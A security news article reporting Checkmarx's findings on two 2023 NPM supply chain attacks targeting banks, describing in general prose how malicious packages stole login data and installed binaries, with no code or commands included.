Application security provider Checkmarx has identified what it describes as the first open source software supply chain attack to target the banking sector.
In a recent report, Checkmarx researchers analyzed two different advanced supply chain attacks that relied on open source toolsets. The target of both attacks was a bank.
The first attacks began in February 2023, when threat actors uploaded packages to NPM, the world’s largest software registry.
This package contained a payload designed to latch onto a specific login form element on the targeted bank’s webpage, covertly intercept the login data, and send it to a remote location.
The premise of the second attack, observed from early April 2023, is similar: the threat actor uploads the package to NPM.
These packages contained pre-install scripts that executed malicious intent upon installation.
First, the script identified the victim’s operating system (Windows, Linux, or Darwin/MacOS). Based on the results, the script then decoded the relevant encrypted files in her NPM package.
The attackers then used these files to download malicious binaries onto the victim’s system.
read more: Opinion: The open source software in our pockets needs our help
To evade detection and bypass traditional deny list techniques, the attackers created subdomains on Microsoft Azure CDN that incorporated the names of the targeted banks.
We also leveraged the Havoc Framework, an advanced post-exploitation command and control framework created by a self-proclaimed “malware author” operating under the Twitter handle @C5pider.
“Havoc’s ability to bypass standard defenses like Windows Defender makes it a go-to option for threat actors to replace legitimate toolkits such as Cobalt Strike, Sliver, and Brute Ratel,” the report states.
Checkmarx also noted that the contributors behind these packages were linked to personal LinkedIn profile pages posing as employees of the targeted banks.
A security researcher commented: “Our original assumption was that this may have been a penetration test by the bank. However, the response we received when we contacted the financial institution for clarification indicated a different situation. The bank was unaware of this activity.”
Although the malicious open-source package was reported and removed by Checkmarx, the company predicts that “the trend of attacks against the banking sector’s software supply chain will continue.”
The researchers argued that sole vulnerability scanning at the build level “is no longer relevant in the face of today’s advanced cyberthreats.” Once a malicious open-source package enters the pipeline, it is essentially an immediate compromise, rendering further countermeasures ineffective. […] This widening gap underscores the urgency of shifting strategies from simply managing malicious packages to actively preventing them from entering the software development lifecycle (SDLC) in the first place. ”
On July 12, 2023, SOCRadar found that the financial industry is facing a surge in ransomware threats, ranking seventh as the sector most targeted by ransomware attackers in the first half of 2023.
